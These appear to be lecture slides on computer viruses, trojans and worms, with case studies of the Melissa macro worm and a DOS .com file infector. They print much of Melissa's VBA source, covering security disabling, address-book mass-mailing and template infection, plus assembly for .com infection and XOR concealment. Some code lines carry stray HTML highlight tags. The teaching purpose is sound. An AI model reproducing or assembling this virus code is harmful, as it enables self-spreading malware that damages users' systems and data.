Viruses, Trojan Horses, and Worms

Propagation of malicious code Malicious indicates the potential to do damage. Usually classified by the type of propagation. Sometimes classified by Platforms and mechanisms it requires to run E.g. macro viruses. Virus/Trojan/worm may not actually cause damages.

Viruses Program or piece of code that will reproduce itself. Sometimes perform a particular action. Definition from RFC 1135 A virus is a piece of code that inserts itself into a host, including operating systems, to propagate. It cannot run independently. It requires that its host program be run to activate it.

Worm A worm is similar to a virus, but it does not locally reproduce. Propagates between systems only. Definition from RFC 1135 A worm is a program that can run independently, will consume the resources of its host from within in order to maintain itself and can propagate a complete working version of itself on to other machines.

Macro Virus Sometimes considered worms. Require a host program to process/run it in order for it to execute. Often written in VBA (Visual Basic for Application) for Word, Access, Excel, PowerPoint, and outlook etc. E.g. Melissa

Trojan Horses Code disguised as benign programs, but behave in an unexpected, usually malicious manner. User needs to be convinced to accept/run them. E.g. Pokemon worm, which will display animated pictures of bouncing Pikachu on your screen while it e-mails itself to everyone in your address book and prepares to delete every files.

The Trojan horses initially appears as an e-mail with the title "Pikachu Pokemon" and the English message "Pikachu is your friend”. The above picture is what the users see when executing pokemon.exe (its attachment). What they don’t see is the application e-mailing itself and deleting files from the system.

Anatomy of a Virus Two primary components Propagation Propagation mechanism Payload Propagation Method by which the virus spreads itself. Old days: single PC, transferred to other hosts by ways of floppy diskettes. Nowadays: internet.

Types of Propagation Parasitic Boot sector infectors Propagates by being a parasite on other files. Attaching itself in some manner that still leaves the original file usable. .com and .exe files of MS-DOS Macro virus Boot sector infectors Copy themselves to the bootable portion of the hard (or floppy) disk. The virus gain control when the system is booted.

Normal boot procedure It first goes through its usual POST Power On Self Test BIOS (Basic Input/Output System) does what is referred to a as bootstrap Checking for a valid bootable disk For a hard drive to be bootable, it must contain a Master Boot Record (MBR). Chuck of code that lies at the beginning of the hard drive. Understand the partition table.

Viruses have two opportunities to take control. The MBR code will look for a particular partition that is marked bootable (MSDOS fdisk: active), and then transfer control to the code. This code is known as the boot sector. Viruses have two opportunities to take control. Insert themselves into the MBR position They can gain control under all situations At the expense of having to deal with reading and booting via the partition table.

Insert themselves into the boot sector of a partition Boot sector viruses tend to take the existing MBR or boot sector code, relocate it elsewhere, and then insert themselves into the record. When the system boots, they can do their things, and then transfer control the the relocated code that they replaced.

Multi-partite Refers to viruses that can use multiple means of infection, such as MBR Boot sector Parasitic

Payload Refers to what the virus does (besides propagation) once executed. Do nothing Do cute things Malicious damage such as delete your partition table. Some viruses have a particular trigger. Date Number of successful infections

Smart viruses usually use infrequent trigger so that they have ample time to ensure they have properly propagated, before alerting the users.

Case Study I: Melissa Melissa works by infecting the Document_Open() macro of Microsoft word. Run immediately when the user opens the word files. Private Sub document_open() On Error Resume Next

Disable the macro security features If System.PrivateProfileString("", "HKEY_CURRENT_USER \Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CURRENT_USER \Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& Else p$ = "clone" CommandBars("Tools").Controls("Macro").Enabled = False Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1) End If

A way to tell if it has already infected the host. MAPI stands for “Messaging API”, a way for Windows applications to interface with various e-mail functionalities. A way to tell if it has already infected the host. Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") If System.PrivateProfileString("", "HKEY_CURRENT_USER\ Software\Microsoft\Office\", "<B style="color:black;background-color:#ffff66"> Melissa</B>?") <> "... by Kwyjibo" Then

To see if the application is outlook Compose of a list of the first 50 email addresses from the address book If UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo

Actually send emails Wrap up BreakUmOffASlice.Subject = "Important Message From " & Application.UserName BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)" BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y DasMapiName.Logoff End If p$ = "clone" System.PrivateProfileString("", "HKEY_CURRENT_USER \Software\Microsoft\Office\", "<B style= "color:black;background-color:#ffff66">Melissa</B>?") = "... by Kwyjibo"

Check to see if the active document and document template are infected. Infect it.

Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1) Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1) NTCL = NTI1.CodeModule.CountOfLines ADCL = ADI1.CodeModule.CountOfLines BGN = 2 If ADI1.Name <> "<B style="color:black;background-color:#ffff66">Melissa</B>" Then If ADCL > 0 Then _ ADI1.CodeModule.DeleteLines 1, ADCL Set ToInfect = ADI1 ADI1.Name = "<B style="color:black;background-color:#ffff66">Melissa</B>" DoAD = True End If If NTI1.Name <> "<B style="color:black;background-color:#ffff66">Melissa</B>" Then If NTCL > 0 Then _ NTI1.CodeModule.DeleteLines 1, NTCL Set ToInfect = NTI1 NTI1.Name = "<B style="color:black;background-color:#ffff66">Melissa</B>" DoNT = True If DoNT <> True And DoAD <> True Then GoTo CYA

Modifying the Document_Open() and Document_Close() function of the active document. Every new document created, upon closing or saving will run the Melissa worm. Saving the current document.

Case Study: .com Virus A .com virus may be divided into three parts. Replicator Concealer Bomb (payload)

Replicator Spread the virus. Copy rest of the code at the end. The uninfected file The virus code P1 P2 P1

Copy small portion of its code to the beginning of the file. Copy the second part of itself to the end of the file. What do V1 and V2 do? V1 transfers control of the program to V2. V1 P2 P1 V2

The code to do this is simple: The value of Duh must be changed to reflect the length of the file that is infected. Dup = length of V1+ original size of the inflect file+ 256 (to account for the start position). E.g. if file size = 79 and V1=6 Dup = 6+79+256 = 341. Another approach JMP FAR PTR Duh ; Takes four bytes Duh DW V2_Start ; Takes two bytes DB 1101001b ; Code for JMP ; (2 byte-displacement) Duh DW V2_Start - OFFSET Duh ; 2 byte displacement

V2 contains the rest of the code. The last part of V2 copies P1 over V1 (in memory) and then transfers the control to the beginning of the file (in memory). MOV SI, V2_START ; V2_START is a LABEL marking ; where V2 starts SUB SI, V1_LENGTH ; Go back to where P1 is stored MOV DI, 0100h ; All COM files are loaded @ ; CS:[100h] in memory MOV CX, V1_LENGTH ; Move CX bytes REP MOVSB ; DS:[SI] -> ES:[DI] MOV DI, 0100h JMP DI

The code assume that P1 is located just before V2. It also assumes ES equals to CS. If these assumptions are false, we can change it accordingly. PUSH CS ; Store CS POP ES ; and move it to ES ; Note MOV ES, CS is not a ; valid instruction MOV SI, P1_START ; Move from wherever P1 is stored MOV DI, 0100h ; to CS:[100h] MOV CX, V1_LENGTH REP MOVSB MOV DI, 0100h JMP DI

The code first moves CS into ES. Then sets the source pointer of MOVSB to where P1 is located. Note that the offset of P1 is 100h higher than the physical file location, as COM files are loaded starting from CS:[100h]. Infecting .EXE file is much more complicated.

Replicator portion Steps Finding a file to infect Find a file to infect. Check if it is already infected. If so, go back to 1 Infect it. If infected enough, quit Otherwise, go back to 1 Finding a file to infect Write a directory traversal procedure Issuing FINDFIRST and FINDNEXT calls

Infection should take the following steps: Once you find the file, open it and read the first few bytes. If they are the same as the first few bytes of V1, then the file is already infected. Infection should take the following steps: Change the file attributes to nothing. Save the file date/time stamps. Close the file. Open it again in read/write mode. Save P1 and append it to the end of the file. Copy V1 to the beginning, but change the offset which it JMPs to so it transfers control correctly. Append V2 to the end of the file. Restore file attributes /date/time.

Sample code to Check if the file has been infected. mov ah,3Fh ; Read first three mov cx, 3 ; bytes of the file lea dx, [bp+offset buffer] ; to the buffer int 21h mov ax, 4202h ; SEEK from EOF xor cx, cx ; DX:CX = offset xor dx, dx ; Returns filesize int 21h ; in DX:AX sub ax, virus_size + 3 cmp word ptr [bp+offset buffer+1], ax jnz infect_it bomb_out: mov ah, 3Eh ; else close the file int 21h ; and go find another Sample code to Check if the file has been infected.

Concealer Conceals the program from notice by the everyday user and virus scanner. A simple XOR encryption: encrypt_val db ? decrypt: encrypt: mov ah, encrypt_val mov cx, part_to_encrypt_end - part_to_encrypt_start mov si, part_to_encrypt_start mov di, si xor_loop: lodsb ; DS:[SI] -> AL xor al, ah stosb ; AL -> ES:[DI] loop xor_loop ret

Bomb Does all nasty things to annoy the user. Some possible bombs System slowdown Easily handled by trapping an interrupt and causing a delay when it activates. File deletion. Message Display. Killing/Replacing the partition table or boot sector of the hard drive.

Anti-virus Techniques Integrity/behavioral Checkers Use good OS Use virus scanner on computer and email-server. Use virus scanner Do not open attachments to emails. Frequent backups.

Reference Kevin L. Poulsen, "Hack Proofing Your Network: Internet Tradecraft", Chapter 14, p.383 – 405 Dark Angel’s Phunky Virus Writing Guide http://www.sirkussystem.com/virus.html Introduction Installment II: the replicator